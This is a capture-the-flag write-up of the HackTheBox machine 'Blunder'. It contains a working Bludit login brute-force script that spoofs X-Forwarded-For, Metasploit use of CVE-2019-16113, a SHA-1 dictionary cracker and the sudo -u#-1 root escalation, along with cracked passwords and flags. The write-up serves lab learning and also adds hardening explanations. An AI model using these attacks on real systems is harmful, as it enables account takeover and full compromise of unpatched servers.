
Hi again! This is my write-up of Blunder, an easy Linux box released on May 30th, 2020 on HackTheBox.
Recon
For starters, let's use Nmap to scan the target.
$ nmap -A -p- -T4 10.10.10.191
Here is the output of that command:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-31 14:12 CEST
Nmap scan report for 10.10.10.191
Host is up (0.024s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%), Linux 3.7 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 26.50 ms 10.10.14.1
2 26.96 ms 10.10.10.191
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.29 seconds
After taking a look at the website, there wasn't much to discover either. I tried to look for hidden files and directories. This is where it gets interesting. I'm used to using DirBuster for that task, but I've had some trouble with screen resolution in VMs lately, so the nice graphical interface wasn't showing up properly, so I decided to install gobuster, a command-line alternative. And because it's command-line based, it's faster and more practical (and any good hacker should use commands, right? 🙂).
gobuster -w /usr/share/wordlists/directory-list-2.3-medium.txt dir -u http://10.10.10.191:80/
That uncovers a few folders and files, but one in particular stands out: /admin. When navigating to http://10.10.10.191/admin, you get a Bludit login form, Bludit being a CMS with a few known vulnerabilities (its brute-force protection can be bypassed, for example). One thing we still need before trying that is a username.

After some (long) time, I used gobuster again, looking for .txt files this time. Indeed, there are sometimes very useful files like credentials.txt, robots.txt, todo.txt, users.txt, config.txt, etc.
gobuster -w /usr/share/wordlists/directory-list-2.3-medium.txt dir -u http://10.10.10.191:80/ -x txt
Speak of the devil: todo.txt contains some interesting information:

Fergus seems like a username.
Here is the script I found (and modified, so here is the original link). Let's try it out. The trick that makes it work is the X-Forwarded-For header: Bludit's brute-force protection identifies the client by that header when it is present, so sending a fresh value with every attempt keeps the lockout counter from ever reaching its limit.
#!/usr/bin/env python3
# Brute-force the Bludit login for a known username. Every attempt fetches a fresh
# CSRF token and sends a different X-Forwarded-For value, which is what defeats
# Bludit's per-IP lockout.
import re
import requests
import sys

host = 'http://10.10.10.191'
login_url = host + '/admin'
username = 'fergus'

print("[*] Reading wordlist...")
with open(sys.argv[1], "r") as f:
    wordlist = [p.rstrip("\n") for p in f.readlines()]

print("====================== CONFIG ======================")
print("== login url : {}".format(login_url))
print("== username : {}".format(username))
print("== wordlist : {} ({} passwords)".format(sys.argv[1], len(wordlist)))
print("====================================================")
print("\n[*] Starting")

counter = 0
for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    # the login form carries a per-session CSRF token that must be sent back
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    if counter % 100 == 0 and counter != 0:
        print('[*] {} tries...'.format(counter))
    headers = {
        # Bludit keys its failed-login counter on this header when present,
        # so every attempt looks like it comes from a new client
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }
    login_result = session.post(login_url, headers=headers, data=data, allow_redirects=False)
    # a successful login answers with a redirect to the dashboard
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u=username, p=password))
            print()
            break
    counter += 1
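To make the bypass concrete, here is an added example of my own (not Bludit's code): a model of a per-client login lockout, once in the form the script exploits (the client is whatever X-Forwarded-For says) and once hardened so the header is only honoured when it comes from a known reverse proxy, each replayed against a single attacker who spoofs the header on every attempt. The lockout threshold, proxy address, attacker address and candidate list are constructed for the demo.

```python
from collections import defaultdict

MAX_FAILURES = 10                 # assumed lockout threshold for the model
TRUSTED_PROXIES = {"10.0.0.2"}    # hypothetical reverse proxy in front of the app


class LoginLimiter:
    """Per-client failed-login counter. With trust_any_xff=True it has the
    weakness the brute-force script exploits: the client is identified by the
    X-Forwarded-For header whenever one is present."""

    def __init__(self, trust_any_xff):
        self.trust_any_xff = trust_any_xff
        self.failures = defaultdict(int)

    def client_ip(self, remote_addr, headers):
        xff = headers.get("X-Forwarded-For")
        if xff:
            if self.trust_any_xff:
                # vulnerable: any client can claim any address, or any string at all
                return xff.split(",")[0].strip()
            if remote_addr in TRUSTED_PROXIES:
                # hardened: honour the header only from our own proxy, and take the
                # entry that proxy appended (the last one), never the first,
                # attacker-controlled entry
                return xff.split(",")[-1].strip()
        return remote_addr

    def is_blocked(self, remote_addr, headers):
        return self.failures[self.client_ip(remote_addr, headers)] >= MAX_FAILURES

    def record_failure(self, remote_addr, headers):
        self.failures[self.client_ip(remote_addr, headers)] += 1


def simulate_bruteforce(limiter, candidates, attacker_addr="10.10.14.5"):
    """Replay one wrong password per candidate from a single source address,
    spoofing X-Forwarded-For with the candidate itself, exactly as the script
    above does. Returns how many attempts reached the password check."""
    checked = 0
    for pw in candidates:
        headers = {"X-Forwarded-For": pw}
        if limiter.is_blocked(attacker_addr, headers):
            break  # the model's lockout is permanent, so later attempts fail the same way
        limiter.record_failure(attacker_addr, headers)  # every candidate is wrong
        checked += 1
    return checked


CANDIDATES = [f"pass{i}" for i in range(200)]  # constructed wordlist for the demo

if __name__ == "__main__":
    print("vulnerable limiter let through:", simulate_bruteforce(LoginLimiter(True), CANDIDATES))
    print("hardened limiter let through:  ", simulate_bruteforce(LoginLimiter(False), CANDIDATES))
```

With the vulnerable limiter all 200 candidates reach the password check; with the hardened one the attacker is cut off after 10, because the counter is keyed on the socket address it cannot change. The same rule applies to any proxy header (X-Real-IP, CF-Connecting-IP): only trust it from the hop that actually sets it.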
With rockyou I gave up after a few hours, it's just taking too long... So after trying a few other wordlists, I created my own from the site's own content.
cewl --depth 5 --min_word_length 5 http://10.10.10.191 > wordlist.txt

Here we go, we've got credentials!
fergus:RolandDeschain
Own user
Now let's use another Bludit vulnerability: the directory traversal in the image upload, CVE-2019-16113, which turns the credentials we just got into code execution.
Fire up Metasploit (the exploit/linux/http/bludit_upload_images_exec module takes the username and password above) and let it handle the rest:

Just remember to set LHOST to the IP address of your tun0 interface.
To get a shell, type shell at the meterpreter prompt, then upgrade it to a proper TTY with python -c 'import pty; pty.spawn("/bin/bash")'
After some enumeration, I found an interesting file with user credentials that we only need to crack. Judging by the paths, this is a second, newer Bludit install (3.10.0a) next to the 3.9.2 one the site is served from, at /var/www/bludit-3.10.0a/bl-content/databases:
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    }
}
Remember, the most powerful tool to crack hashes is... Google. Just kidding, but googling a hash often tells you which algorithm produced it and sometimes, as here, the password itself. This one is 40 hex characters, the length of a SHA-1 digest, and the unsalted SHA-1 of a common password is in every lookup table.
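A more reliable way than Google, as an added example that is not part of the original write-up: identify the hash by its length and run a wordlist through the candidate algorithms. The wordlist below is constructed for the demo (in practice, feed it rockyou or the cewl output from earlier); the salt handling is there for installs whose users.php carries a salt field, and which concatenation order the CMS uses is an assumption to check against its source.

```python
import hashlib
import re

# Digest lengths in hex characters and the algorithms that produce them. Length only
# narrows the field (a 32-char value could also be NTLM, for instance), so these are
# candidates to try, not a verdict.
HEX_DIGEST_CANDIDATES = {
    32: ["md5"],
    40: ["sha1"],
    64: ["sha256"],
    128: ["sha512"],
}

# Constructed wordlist for the demo; in practice use rockyou or the cewl output.
DEMO_WORDLIST = ["password", "Password1", "RolandDeschain", "Password120"]


def identify_hex_hash(value):
    """Return candidate algorithms for a hex digest, or [] if it is not hex at all."""
    if not re.fullmatch(r"[0-9a-fA-F]+", value):
        return []
    return HEX_DIGEST_CANDIDATES.get(len(value), [])


def hash_hex(algorithm, text):
    """Lower-case hex digest of `text` under a hashlib algorithm name."""
    return hashlib.new(algorithm, text.encode()).hexdigest()


def candidate_digests(algorithm, password, salt):
    """Digests to compare for one candidate password. Without a salt this is the plain
    hash; with one, both concatenation orders are tried because CMSes differ."""
    if not salt:
        return [hash_hex(algorithm, password)]
    return [hash_hex(algorithm, password + salt), hash_hex(algorithm, salt + password)]


def crack(target, wordlist, salt=""):
    """Dictionary attack: the first candidate whose digest under any plausible
    algorithm equals `target`, or None if the wordlist is exhausted."""
    target = target.lower()
    for algorithm in identify_hex_hash(target):
        for password in wordlist:
            if target in candidate_digests(algorithm, password, salt):
                return password
    return None


if __name__ == "__main__":
    hugo_hash = "faca404fd5c0a31cf1897b823c695c85cffeb98d"  # the "password" value from users.php
    print(identify_hex_hash(hugo_hash), crack(hugo_hash, DEMO_WORDLIST))
```

The reason this is so cheap is that SHA-1 is a fast, unsalted digest: every candidate costs one hash call, and the same table of precomputed hashes serves every site that stores passwords this way. A password store should use a slow, salted construction (scrypt, bcrypt or Argon2) so that each candidate costs enough to make a dictionary run like this impractical.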

So now we've got the following credentials:
hugo:Password120
Let's get the user flag and get right to the root privilege escalation that is fairly simple on this box.
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ su hugo
Password: Password120
hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cat /home/hugo/user.txt
eef5cf18500c8b9f749c16e82a05890e
Own root
The first thing to always do when getting new privileges is to check what you're allowed to do: sudo -l
hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
(ALL, !root) /bin/bash: never seen this one, let's google it. It turns out to be an easy root. The rule lets hugo run bash as any user except root, but sudo before 1.8.28 (CVE-2019-14287) accepts a numeric user ID of -1 (or 4294967295): it is not 0, so the !root check passes, and setresuid() treats -1 as "leave unchanged", so the already-root sudo process never drops privileges and bash starts as root. Just type in: sudo -u#-1 /bin/bash
hugo@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ sudo -u#-1 /bin/bash
root@blunder:/var/www/bludit-3.9.2/bl-content/tmp# cat /root/root.txt
07fa8ead67b17057681397f0a9e9a5f7
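The trick only works on sudo builds older than 1.8.28, and the write-up never shows sudo -V, so it is worth checking before trying. Here is an added helper of my own (not from the original write-up) that parses sudo -V and sudo -l output and lists the commands that sudo -u#-1 would run as root; the sample sudo -l text is the one from this box, retyped as a constructed string.

```python
import re

FIXED_IN = (1, 8, 28)  # first sudo release that rejects -u#-1 and -u#4294967295

# A rule line as printed by "sudo -l" whose runas list excludes root by name,
# e.g. "(ALL, !root) /bin/bash": group 1 is the runas spec, group 2 the command.
NOT_ROOT_RULE = re.compile(r"^\s*\(([^)]*!root[^)]*)\)\s+(.+?)\s*$", re.MULTILINE)
# Tags that may prefix the command part of a rule.
TAGS = re.compile(r"^(?:(?:NOPASSWD|PASSWD|SETENV|NOSETENV):\s*)+")

# Constructed sample: the sudo -l output from this box, retyped.
SAMPLE_SUDO_L = r"""Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""


def parse_sudo_version(sudo_v_output):
    """(major, minor, patch) from `sudo -V` output; a pNN suffix is ignored."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    return tuple(int(x) for x in m.groups()) if m else None


def not_root_commands(sudo_l_output):
    """Commands allowed by a rule whose runas list is everyone except root."""
    return [TAGS.sub("", cmd) for _, cmd in NOT_ROOT_RULE.findall(sudo_l_output)]


def uid_minus_one_targets(sudo_v_output, sudo_l_output):
    """Commands that `sudo -u#-1 <cmd>` would run as root on this host: the rule
    only bans the name root, and sudo before 1.8.28 passes uid -1 straight to
    setresuid(), which leaves the already-root process unchanged."""
    version = parse_sudo_version(sudo_v_output)
    if version is None or version >= FIXED_IN:
        return []
    return not_root_commands(sudo_l_output)


if __name__ == "__main__":
    # Constructed sudo -V line for the demo; feed real `sudo -V` / `sudo -l` output here.
    print(uid_minus_one_targets("Sudo version 1.8.25p1", SAMPLE_SUDO_L))
```

On a patched sudo the function returns an empty list even though the (ALL, !root) rule is still there, which is the right answer: the rule itself is only dangerous in combination with the old binary. Note that sudo -l on this box asks for hugo's password, so capture its output interactively and pass the text in.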
And that's all for this write-up, I hope you enjoyed it 😉